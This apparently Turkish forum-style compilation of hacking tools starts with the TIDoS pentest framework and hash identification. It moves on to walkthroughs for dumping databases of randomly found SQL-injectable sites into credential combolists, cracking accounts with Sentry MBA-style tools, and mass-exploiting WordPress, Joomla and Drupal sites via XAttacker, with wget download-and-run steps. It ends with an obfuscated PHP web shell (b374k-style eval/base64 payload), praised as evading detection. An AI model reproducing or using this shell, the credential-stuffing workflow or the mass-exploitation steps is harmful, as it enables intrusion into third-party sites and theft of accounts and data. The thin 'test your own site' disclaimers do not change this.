TIDoS Framework
 • Keşiften Güvenlik Açığı Analizine kadar her şeyi kapsayan çok yönlü bir framework.
 • Toplam 108 modülden oluşan 14 alt faza bölünmüş 5 ana faz vardır .
 • Keşif Aşaması’nın kendine ait 50 modülü vardır (aktif ve pasif keşif, bilgi açıklama modülleri dahil).
 • Tarama ve Numaralandırma Aşamasında 16 modül vardır (port taramaları, WAF analizi vb. Dahil)
 • Güvenlik Açığı Analiz Aşamasında 37 modül vardır (en yaygın güvenlik açıkları dahil).
 • Exploits Castle’da sadece 1 vuln. vardır.
 • Dört fazın her birinde, Auto-Awesomeher modülü sizin için otomatikleştiren bir modül bulunur.
 • Sadece hedef siteye ihtiyacınız var geri kalanı kendi hallediyor :D
 • TIDoS tam kapsamlı desteğe sahiptir, bu yüzden neler olduğunu bilirsiniz.
 • Tamamen kullanıcı dostu etkileşim ortamı.

Kurulum:

chmod +x install
./install

Tidos Framework, keşif, tarama, numaralandırma ve güvenlik açıkları analizi gibi tüm önemli sızma testi görevlerini gerçekleştiren açık kaynaklı bir araç setidir. Tüm görevler, yerleşik modüller kullanılarak aşamalı olarak gerçekleştirilir. Toplam modül sayısı 100’ü aşıyor ve çoğunluğu keşif ve güvenlik açığı analizi için kullanılıyor.

Tidos Framework Nasıl Kurulur

Tidos, aşağıdaki komutu kullanarak Github’dan klonlanabilen bir python çerçevesidir.

git clone https://github.com/theInfectedDrake/TIDoS-Framework

Araç setini klonladıktan sonra, bağımlılıkları aşağıdaki gibi kurmak için Tidos çerçeve dizinine gidin.

cd TIDoS-Framework
chmod +x install
./install

Tidos Nasıl Çalışır?

Aşağıdaki komut yalnızca Tidos çerçevesini çalıştırmakla kalmaz, aynı zamanda hedef web uygulamasından sızma testi özelliklerinin kilidini açmasını ister.

python tidos.py

Hedef web uygulaması çalışır durumda ve çalışıyorsa, Tidos aşağıdaki ekran görüntüsünde gösterildiği gibi sızma testi seçeneklerini (aşamaları) görüntüler.

Aşağıda, Tidos çerçevesi kullanılarak gerçekleştirilebilecek her aşamanın kısa bir açıklaması yer almaktadır.

Keşif ve Açık Kaynak İstihbaratı

Keşif ve açık kaynak istihbaratı, (a) Pasif Ayak İzi, (b) Aktif Keşif ve (c) Bilgi ifşası olmak üzere üç alt aşamaya ayrılmıştır. Pasif ayak izi, WHOIS Araması, DNS yapılandırması, alt ağ numaralandırması, ters IP araması, arşivlenmiş veriler ve LinkeIn gibi arama motorlarında ve sosyal profillerde bulunan bilgileri toplama gibi tüm pasif bilgi toplama tekniklerini içerir. Tidos tüm bu tarama seçeneklerini otomatik olarak çalıştırabilir veya istenilen seçeneği seçerek manuel tarama yapabilir. Benzer şekilde, aktif keşif taraması seçeneği, hedef web sunucusuna ping atmak gibi hedef web uygulamasıyla etkileşim gerektiren tüm tarama tekniklerini içerir. Aktif keşif seçeneklerinin tam listesi aşağıdaki ekran görüntüsünde görülebilir.

Bilgiyi ifşa etme seçeneği, düz metin biçiminde bulunan hassas veriler için hedef web uygulamasını tarar. Veriler, kredi kartı bilgileri, sosyal güvenlik numaraları, telefon numaraları vb. Olabilir.

Tarama ve Numaralandırma

Tarama ve numaralandırma aşaması, web uygulaması güvenlik duvarı bilgileri, açık bağlantı noktaları numaralandırma, Banner yakalama ve ön uç teknolojiler hakkında bilgiler gibi hedef uygulama hakkında yararlı bilgiler sağlar.

Örneğin, afiş kapma seçeneğini seçersek, Tidos çerçevesi sunucu bilgilerini, barındırma bilgilerini, şifreleme tekniğini, sıkıştırma algoritmalarını ve rakiplere yardımcı olabilecek diğer yararlı bilgileri almak için web uygulamasını farklı bağlantı noktaları üzerinden hedefler.

Güvenlik Açığı Analizi

Güvenlik açığı analizi, Tidos çerçevesinin en önemli faydasıdır. Bu yardımcı programı kullanarak, hedef web uygulamalarının temel ve kritik güvenlik açıkları değerlendirmesi yapılabilir. Temel güvenlik açıkları değerlendirmesinde Tidos, hedef web uygulamasının tıklama hırsızlığı, bölge aktarımı, tanımlama bilgisi enjeksiyonu, siteler arası izleme ve aşağıdaki ekran görüntüsünde belirtilen diğer birkaç güvenlik açığına karşı savunmasız olup olmadığını kontrol eder.

Kritik güvenlik açıkları analizi seçeneği, hedef web uygulamasının SQL enjeksiyonları, Siteler Arası Komut Dosyası (XSS), Yerel Dosya Ekleme (LFI), Uzaktan Dosya Ekleme (RFI), İşletim Sistemi Komut Enjeksiyonu gibi bir dizi yüksek riskli güvenlik açığına karşı taranmasına olanak tanır. XPath enjeksiyonu, PHP kod enjeksiyonu, siteler arası istek sahteciliği ve Xpath enjeksiyonu. Tidos, kritik güvenlik açıkları değerlendirmelerini gerçekleştirmek için farklı teknikler uygular. Örneğin, hedef web uygulamasını SQL enjeksiyon güvenlik açıklarına karşı taramak için Tidos araç seti, manuel ve otomatik modda hata ve kör tabanlı teknikler kullanır. Manuel modda, kullanıcı, hedef web uygulamasını taramak için parametreleri araç setine sağlamalıdır. Otomatik modda, araç seti hedef web uygulamasını tanımlama bilgisi hatası tabanlı ve kullanıcı aracısı hatasına dayalı yerleştirme tekniklerini kullanarak otomatik olarak test eder.Ancak manuel mod, otomatik moddan daha etkilidir.

Örneğin, hata tabanlı + manuel mod tekniğini kullanarak SQL enjeksiyonu için aşağıdaki test url’sini tararsak, araç seti, hedefin herhangi bir SQL enjeksiyon güvenlik açığına sahip olup olmadığını görmek için farklı yükler çalıştırır.

http://phptest.vulnweb.com/listproducts.php?cat=4

Hedef savunmasızsa, araç seti, hedef web uygulamasındaki SQL güvenlik açığından yararlanmanın farklı olası yollarını gösterir.

Diğer Tidos yardımcı programları, sömürü ve Yardımcı modülleri içerir. Araç setinin kullanım özelliği hala geliştirme aşamasındadır ve bu nedenle keşif, tarama ve güvenlik açıkları değerlendirme özelliklerine kıyasla daha az etkilidir. Auxillary modülü, adli tıpta kullanılan görüntülerin veri kodlama, karma işlevi ve Meta veri çıkarma gibi özelliklere sahiptir. Aşağıdaki ekran görüntüsü, araç setinin hash oluşturma işlevini göstermektedir. Araç seti, belirli bir dize için MD5, SHA1, SHA256 ve SHA512 karma değerleri oluşturur.

Sonuç

Tidos Framework, penetrasyon testi yaşam döngüsüne göre tasarlanmış kullanışlı bir araç setidir. Araç seti, sızma testçilerinin web uygulamalarındaki (web siteleri, sunucular, web uygulamaları) güvenlik açıklarını bulmalarına yardımcı olabilir.

Tidos Hash üreteci
manuel olarak doğrulanan sql güvenlik açığı
Temel güvenlik açıkları değerlendirmesi
tarama ve numaralandırma
Aktif Keşif seçenekleri
Tidos menüsü
Tidos bağımlılıkları kurulumu
Hash Identifier

Şifreleme türlerini tespit eden bir araçtır.

root@kali:~# hash-identifier
  #########################################################################
  #   __ __       __    ______  _____    #
  #  /\ \/\ \      /\ \   /\__ _\ /\ _ `\   #
  #  \ \ \_\ \   __   ____ \ \ \___ \/_/\ \/ \ \ \/\ \  #
  #   \ \ _ \ /'__`\  / ,__\ \ \ _ `\   \ \ \  \ \ \ \ \    #
  #   \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \   \_\ \__ \ \ \_\ \   #
  #    \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\   /\_____\ \ \____/   #
  #    \/_/\/_/\/__/\/_/\/___/  \/_/\/_/   \/_____/ \/___/ v1.1 #
  #                 By Zion3R #
  #              www.Blackploit.com #
  #                Root@Blackploit.com #
  #########################################################################

  -------------------------------------------------------------------------
 HASH: 098f6bcd4621d373cade4e832627b4f6

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(WordPress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))

  -------------------------------------------------------------------------

Linuxda Terminal Açıphash-identifier Yazıp Açıyoruz.

Aracımız Açıldı HASH: Kısmına Şifrelenmiş Metni Girip Entarlıyoruz Bu Kadar

*EF9AC024048F2530A59240C62CC218EC8DA28D94

Hash Degerını Gırdık Taakkk Şifreleme Türünü Ve Algoritmasini Verdi MySQL 160bit – SHA-1 (SHA-1 ($pass))
Hash Türünü Tespit Ettikten Sonra Brute Force İşine Başlayalabiliriz.
Hash İdentifier Desteklenen Şifreleme Biçimleri Aşağidaki Gibidir :

 • ADLER-32
 • CRC-32
 • CRC-32B
 • CRC-16
 • CRC-16-CCITT
 • DES(Unix)
 • FCS-16
 • GHash-32-3
 • GHash-32-5
 • GOST R 34.11-94
 • Haval-160
 • Haval-192 110080 ,Haval-224 114080 ,Haval-256
 • Lineage II C4
 • Domain Cached Credentials
 • XOR-32
 • MD5(Half)
 • MD5(Middle)
 • MySQL
 • MD5(phpBB3)
 • MD5(Unix)
 • MD5(WordPress)
 • MD5(APR)
 • Haval-128
 • MD2
 • MD4
 • MD5
 • MD5(HMAC(WordPress))
 • NTLM
 • RAdmin v2.x
 • RipeMD-128
 • SNEFRU-128
 • Tiger-128
 • MySQL5 – SHA-1(SHA-1($pass))
 • MySQL 160bit – SHA-1(SHA-1($pass))
 • RipeMD-160
 • SHA-1
 • SHA-1(MaNGOS)
 • Tiger-160
 • Tiger-192
 • md5($pass.$salt) – Joomla
 • SHA-1(Django)
 • SHA-224
 • RipeMD-256
 • SNEFRU-256
 • md5($pass.$salt) – Joomla
 • SAM – (LM_hash:NT_hash)
 • SHA-256(Django)
 • RipeMD-320
 • SHA-384
 • SHA-256
 • SHA-384(Django)
 • SHA-512
 • Whirlpool
 • And more…

Bu Arada Yukaradaki Hashin Çözülmüş Hali Aşağidadir.
Hash                           Type       Result

*EF9AC024048F2530A59240C62CC218EC8DA28D94 MySQL4.1+ freestuff

Whm Reseller Shower Shell Kit

Reseller shower ismindende belli olmak üzere sunucudaki whmcs & reseller scriptlerin kurulu olduğu kullanıcıları göstermektedir. Reseller shower ismindende belli olmak üzere sunucudaki whmcs & reseller scriptlerin kurulu olduğu kullanıcıları gösteriyor ve symlink deniyor, kesinlikle işinize yaracak olan bir araç symlink özelliği çok iyi olmasa’da en azından whmcs için çekmeniz gereken dizini kendi güncel bypass yöntemlerinizle çekebilirsiniz. Bundada sunucunuzun güvenlik testini gerçekleştirebilirsiniz.

Exploit Scanner

Program; vermiş olduğunuz dorkları arar, ve topladığı linklerden belirtmiş olduğunuz SQL, XSS, RFI, LFI açıklarından olup olmadığını kontrol eder, eğer varsa size bildirir.

Özellikler:

-Google Based Search
-100 links per page
-Excludes google,youtube,rss2 links
-Import from file
-Custom Domain
-SQLi Scanner
-LFi Scanner
-LFi Fuzzing up to 11 directories
-RFi Scanner
-Progress bar

SQL Dumper

1 İlk olarak keyword çekmek gerek bunu keyword sitelerinden değil kendi elimizle yapmamız gerek zulu dan örnek verirsem zulu bedava altın diye alt alta doldurun

sql kullanım 1.PNG

2 Dork üretim kısmına geçiceğiz Tsp dork gen programını açıyoruz ve Dork types kısmındaki herşeyi tikliyoruz keyword kısmına keywordumuzu yapıştırıyoruz sonra Dork amount kısmına 20000 gibi rakam girin.

sql kullanım 3.5.PNG


3 Dork searcher programını açıyoruz hiçbirşey yazmadan login diyoruz source kısmına dorklarımızı proxy kısmına rastgele internetten bulduğunuz bi proxy yi girebilirsiniz
Proxy type den proxy nin socks 4 vs olduğunu girin ve start diyin

Proxy type den proxy nin socks 4 vs olduğunu girin ve start diyin

sql kullanım 3.PNG

4 Sql dumper programına geçiyoruz ayarları şu şekilde yapıyoruz(alıntı fotoğraf)(Bu programı sandboxla açın kendinden sıkıntılıdır)

sql kullanım 4.png4 Bu kısım bittikten sonra Exploitables kısmına geçiyoruz start exploiter butonuna basıyoruz ve bize çektiğimiz siteler arasında exploit edilebilir siteleri sunacak

sql kullanım 5.png5 Bu bölümde bittikten sonra start analyzer butonuna basıyoruz

sql kullanım 6.png6 Start kısmına bastıktan sonra sitelerin databasesini çekmeye başlıycak ve hq combolistiniz hazır olucak

Live Mail Kontrol

Kullanımı oldukça basit bir mail pass check aracıdır. Mail pass listenizi sağlam proxylerle koyup live hesapları çıkarabilirsiniz.

Sentry Mba bir hesap crackleme programıdır. Programa hesaplarını cracklemek istediğiniz sitenin configini ekleyip güzel proxylerle premium hesaplar elde edebilirsiniz. Bunu web sitenizin ve web uygulamalarınızın güvenliğini test etmek için kullanabilirsiniz.

All-in-One Checker

Openbullet benzeri hesap kirma account cracking programının son sürümüdür. Portallarınızın hesap şifrelerinin güvenliğini test edebilirsiniz.

İp Tarayıcı Ve Port Tarayıcı

Angry IP Scanner çok hızlı bir IP adresi ve port tarayıcıdır.

Herhangi bir aralıktaki IP adreslerinin yanı sıra bağlantı noktalarını da tarayabilir. Çok hafif bir programdır. Herhangi bir kurulum gerektirmeyen, portable bir yazılımdır.

Random SQL Scanner

bu sql scanner aracı ile yüzlerce sql açıklı siteyi tek tıkla toplamak mümkün ve bu sitelerin açıklarını bulmak bir o kadar kolay olacaktır. Random site hacklemek isteyenler için iyi bir alternatif. Ama en önemlisi kendi sisteminizin açığının olup olmadığını test etmede idealdir.

[+] Google Dork Tarama | Sadece 5 sayfa (Google IP ban vermemesi açısından) | Zaman desteği (son 1 saat, son 1 gün, son 1 hafta, 1 ay, 1 yıl içerisinde bulunan siteler). İsterseniz zaman desteğini devre dışı bıraka bilirsiniz. Yani bu zaman özelliği ile hacklenmemiş ve pub olmamış sql açıklı siteleri tespit etmiş olursunuz :) Çoğu dork scannerlerde yoktur! :)

[+] Bing Dork Tarama | Sadece 10 sayfa | IP ban yok :)

[+] Hazır dorklar | 3000 e yakın dork listesi. İsterseniz bu dorkları, isterseniz de kendi dorklarınızı tarata bilirsiniz :)

[+] SQLi tarama | Taramadan çıkan siteleri ve ya kendi listenizi programa aktararak geniş SQLi tarama yapa bilirsiniz. Seri tarar :)

[+] URL Crawler | Bu hedef site için ve ya hedef sitenin sunucusunda bulunan diğer siteler için kullanılır :) Hedef siteyi yazıyorsunuz hedef sitedeki linkleri çıkarıyor. İsterseniz bu linkleri kaydede bilirsiniz ve SQL taramaya aktarabilirsiniz. Eğer link az çıkdıysa Geniş taramaya başlayabilirsiniz. Bu sayede siteden daha çok link çıkara ve etkili SQLi açık tarama işlemi yapabilirsiniz. Örneğin ben bir siteden Geniş tarama sayesinde 4000 link çıkarmıştım :D

[+] Dork Tarama | Bu ise toplu dork taramaya yarar :) Yine Bing ve Google üzerinden :)

İlk önce dork taramaya bakalım. Burada Google üzerinden tarama yapalım. Burada gördüğünüz gibi hazır dorklar. İsterseniz bunlardan birini ve ya kendi dorkunuzu taraya bilirsiniz. Kaç sayfa dolaşmasını istiyorsunuz onu yazıyorsunuz ve zaman desteğini istiyorsanız onu da seçiyorsunuz ve taramaya başlıyorsunuz 

Evet gördüğünüz gibi dorkumuzu taradı ve 99 siteyi bize verdi. Şimdi Bing üzerinden taramaya bakalım :)
Burda da yine dorku yazıyoruz sayfayı seçiyoruz ve tara diyoruz tarama başlıyor .

Şimdi çıkan bu siteleri kaydede de bilirsiniz ve ya SQLi taramaya aktara da bilirsiniz :)
Ardından İnvervalı belirliyoruz. İnterval ne onu şöyle anlatıyım sitelerin taranma hızı İntervala verdiğiniz değerle bağlıdır. Örneğin 1 yazsanız hızlı tarar ama sonuç almazsınız (SQL açık olsa bile). O yüzden default olarak 150 bıraktım. Sizde de 150 kalmasını tavsiye ederim. Ardından tara diyoruz otomatik olarak tarama başlıyor.

Evet SQL açık bulundu program çalışıyor demek :)

Şimdi sizlere URL Crawleri anlatıyım :) Bu hedef site ve ya hedef sitenin sunucusundakı diğer siteler için kullanılır :) Sitedeki linkleri çıkarır. Sizde o linkleri SQLi taramaya aktarabilirsiniz SQL açık varsa bulursunuz ve hedef siteye bir şekilde ulaşmış olursunuz :) URL Crawler da 2 yöntem ekledim birisinde yine İnterval var diğerinde ise yok. Ben ikisini de kullanırım şimdi ikisini de anlatıcam.

:)

1. yöntem de İnterval var İntervalı 100 yaptım eğer internetiniz kötü ise ve ya site geç açılıyorsa bunu arttırmanız gerekiyor. Ben 100 olarak bıraktım. Eğer sonuçlar gelmezse bu değeri arttırın :) Şimdi Taramaya başladım gördüğünüz gibi linkler geldi (187 link). Şimdi bunların arasında gereksiz şeyler olabilir javascript[0], mailto: giib yazılar. Linkleri kontrol edin ve bunun gibi yazıları mutlaka bulun sadece linkler kalsın. Bunların üstüne bir kere tıklayarak onları silmiş olursunuz. Tarama zamanı hata almak istemiyorsanız silmeniz tavsiye olunuyor fazla zamanınızı almaz 1-2 dk :) Bunları kaydede bilirsiniz. Yok eğer derseniz ki bu linkler az ben sitenin derinliklerine kadar gitmek istiyorum o zaman Geniş taramayı başlatabilirsiniz :)

Şimdi bir bakalım noldu :)

Evet gördüğünüz gibi az önce 187 di şimdi 216 tarama ilerledikçe bu linklerde artmış olur :)

Şimdi 2. yöntemi göstereyim :)

2. Yöntem biraz daha hızlı. Fakat burada arada-sırada sitenin kaynak kodlarından dolayı tarama devam etmeyebilir. Tarama zamanı durdurulan linkin üzerine ve ya o linkin aşağısında bulunan linke tıklayarak taramaya devam ettire bilirsiniz :) Yani sıkıntı yok tarama devam edicek :).

Gördüğünüz gibi 1414 tane link. Tarama devam ettikce bu linklerin sayısı artmış olucak  Ardından bunları kaydederek SQLi taramaya aktarabiliriz.

Evet gördüğünüz gibi açık geldi. Tabi her sitede olmaz SQL açık varsa olabilir yani etkili yöntem :)

Şimdi de Dork Tarama ya bakalım. Diğer dork tarama yerinde sadece 1 dork tarama hakkımız vardı fakat burada istediğiniz kadar dork tarayabilirsiniz :)

Google da yine sayfayı seçiyoruz zaman desteğini seçiyoruz ve taramaya başlıyoruz :) Tüm linkler sırasıyla taranıcak. Eğer Google İP ban vermiş olursa size haber verir.

:DBing üzerinde de aynı sayfayı seçiyoruz ve taramaya başlıyoruz. Burada İP ban olmuyor bu da iyi bir tarafı.

 

 

X Saldırı Aracı Kiti
[+] Auto Cms Detect

[1] WordPress :

[+] Adblock Blocker
[+] WP All Import
[+] Blaze
[+] Catpro
[+] Cherry Plugin
[+] Download Manager
[+] Formcraft
[+] levoslideshow
[+] Power Zoomer
[+] Gravity Forms
[+] Revslider Upload Shell
[+] Revslider Dafece Ajax
[+] Revslider Get Config
[+] Showbiz
[+] Simple Ads Manager
[+] Slide Show Pro
[+] WP Mobile Detector
[+] Wysija
[+] InBoundio Marketing
[+] dzs-zoomsounds
[+] Reflex Gallery
[+] Creative Contact Form
[+] Work The Flow File Upload
[+] WP Job Manger
[+] PHP Event Calendar
[+] Synoptic
[+] Wp Shop
[+] Content Injection
[+] Cubed Theme NEW
[+] Rightnow Theme NEW
[+] Konzept NEW
[+] Omni Secure Files NEW
[+] Pitchprint NEW
[+] Satoshi NEW
[+] Pinboard NEW
[+] Barclaycart NEW

[2] Joomla

[+] Com Jce
[+] Com Media
[+] Com Jdownloads
[+] Com Fabrik
[+] Com Jdownloads Index
[+] Com Foxcontact
[+] Com Ads Manager
[+] Com Blog
[+] Com Users
[+] Com Weblinks
[+] mod_simplefileupload
[+] Com Facileforms NEW
[+] Com Jwallpapers NEW
[+] Com Extplorer NEW
[+] Com Rokdownloads NEW
[+] Com Sexycontactform NEW
[+] Com Jbcatalog NEW

[3] DruPal

[+] Add Admin
[+] Drupalgeddon NEW

[4] PrestaShop

[+] columnadverts
[+] soopamobile
[+] soopabanners
[+] Vtermslideshow
[+] simpleslideshow
[+] productpageadverts
[+] homepageadvertise
[+] homepageadvertise2
[+] jro_homepageadvertise
[+] attributewizardpro
[+] 1attributewizardpro
[+] AttributewizardproOLD
[+] attributewizardpro_x
[+] advancedslider
[+] cartabandonmentpro
[+] cartabandonmentproOld
[+] videostab
[+] wg24themeadministration
[+] fieldvmegamenu
[+] wdoptionpanel
[+] pk_flexmenu
[+] pk_vertflexmenu
[+] nvn_export_orders
[+] megamenu
[+] tdpsthemeoptionpanel
[+] psmodthemeoptionpanel
[+] masseditproduct
[+] blocktestimonial NEW

[5] Lokomedia

SQL injection

X Attacker Tool içerisinde barındırdığı exploitleri sitelerde toplu şekilde dener açıklı siteleri sizlere raporlar. Bu sayede sisteminizin ne kadar sağlam ve güvenli olduğunu görürsünüz.

Linux Kurulum:

wget https://e-hack.org/upload/dosya/5e60c9ad1b8dbXAttacker-spyhackerz.org.zip
unzip komutu ile zipden çıkarın
cd XAttacker-spyhackerz.org
perl XAttacker.pl

 Android ( Termux ) Kurulumu:

wget https://e-hack.org/upload/dosya/5e60c9ad1b8dbXAttacker-spyhackerz.org.zip
unzip komutu ile zipden çıkarın
cd XAttacker-spyhackerz.org
chmod +x termux-install.sh
bash termux-install.sh

Windows Kurulumu:

Download Perl
Download XAttacker
Extract XAttacker into Desktop
Open CMD and type the following commands:
cd Desktop/XAttacker-spyhackerz.org/
perl XAttacker.pl

Müfettiş: The İnspector:

İhtiyacınız olan birçok bilgiyi elde edebiliyorsunuz. örnek vermem gerekirse web site bilgileri, telefon numaraları, ip adresi ve e posta sunucusunu, domain bilgileri web sitesini ve ip adres lokasyonunu, cloudflare bypass etme, domainin yaşını öğrenme, kullanıcı aracısı bilgisini, kaynaktaki aktif servisleri kontrol etme, kredi cartı numarasini doğrulama, alt domainleri tarama, e posta adreslerini kontrol, içerik yönetim sistemi kontrol etme bulunmaktadır. Bir hacker icin en önemli araç kitidir.

Linux Kurulum:

wget https://e-hack.org/upload/dosya/5e60d036e0d6bTh3inspector-spyhackerz.org.zip
unzip komutu ile zipden çıkarın
cd Th3inspector-spyhackerz.org
chmod +x install.sh && ./install.sh

Android ( Termux ) Kurulumu:

wget https://e-hack.org/upload/dosya/5e60d036e0d6bTh3inspector-spyhackerz.org.zip
unzip komutu ile zipden çıkarın
cd Th3inspector-spyhackerz.org
chmod +x install.sh && ./install.sh

Windows Kurulumu:

Download Perl
Download Th3inspector
cpan install JSON
Extract Th3inspector into Desktop
Open CMD and type the following commands:
cd Desktop/Th3inspector-spyhackerz.org
perl Th3inspector.pl

X Brute Forcer

WordPress Joomla Drupal Opencart Magento ve tüm sistemlerde özellikle içerik yönetim sistemlerinde kaba kuvvet saldırısı yapabilmektedir. Kendi sitenizin bu sisteme karşı güvenlik durumunu görebilirsiniz.

Kullanımı;

perl XBruteForcer.pl -l sitelist.txt -p passwords.txt

Linux Kurulum:

wget https://e-hack.org/upload/dosya/5e60d4695427bXBruteForcer-spyhackerz.org.zip
unzip komutu ile zipden çıkarın
cd XBruteForcer-spyhackerz.org
perl XBruteForcer.pl -l sitelist.txt -p passwords.txt

Android ( Termux ) Kurulumu:

cpan install LWP::UserAgent
cpan install HTTP::Request
wget https://e-hack.org/upload/dosya/5e60d4695427bXBruteForcer-spyhackerz.org.zip
unzip komutu ile zipden çıkarın
cd XBruteForcer-spyhackerz.org
perl XBruteForcer.pl -l list.txt -p passwords.txt

Windows Kurulumu:

Download Perl
Download XBruteForcer
Extract XBruteForcer into Desktop
Open CMD and type the following commands:
cd Desktop/XBruteForcer-spyhackerz.org/
perl XBruteForcer.pl -l sitelist.txt -p passwords.txt
Context Ext Shell Code Name Bypass Shell

Yazmış Olduğum mükemmel bir shelldir, birçok sunucuya yakalanmaz ve size rahat bir hack ortamı sağlar, içeriğinde webadmin’den tanıdığımız filemanegeri gelir ve yanında çok çok gelişmiş bir config grabber vardır , 4 farklı method ile config çekmenizi sağlar, manuel symlink özelliğide eklenmiştir, ayrıca kullanmak istersiniz diye telnet scriptinide çağırmanız için bir butonu vardır, Jump özelliği ilede farklı dizinlere geçiş yapabilirsiniz, en güzel yanı ise fazla özelliklere boğulmamış ve sadece en ihtiyaç olan özellikler ile shell birleştirilmiş. Renk tonları siyahtır.

<?php
echo “”;

$s_pass = “fb621f5060b9f65acf8eb4232e3024140dea2b34”; // default password : b374k (login and change to new password)
$s_func=”cr”.”eat”.”e_fun”.”cti”.”on”;$b374k=@$s_func(‘$x,$y’,’ev’.’al’.'(“\$s_pass=\”$y\”;?>”.gz’.’inf’.’late’.'( bas’.’e64′.’_de’.’co’.’de($x)));’);@$b374k(“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